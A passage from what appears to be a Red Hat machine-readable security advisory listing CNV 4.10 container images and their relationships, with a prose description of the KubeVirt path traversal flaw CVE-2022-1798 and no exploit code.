"container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", product_id: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", product_id: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", product_id: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", product_id: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.10.5-3", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", }, product_reference: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", }, product_reference: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", 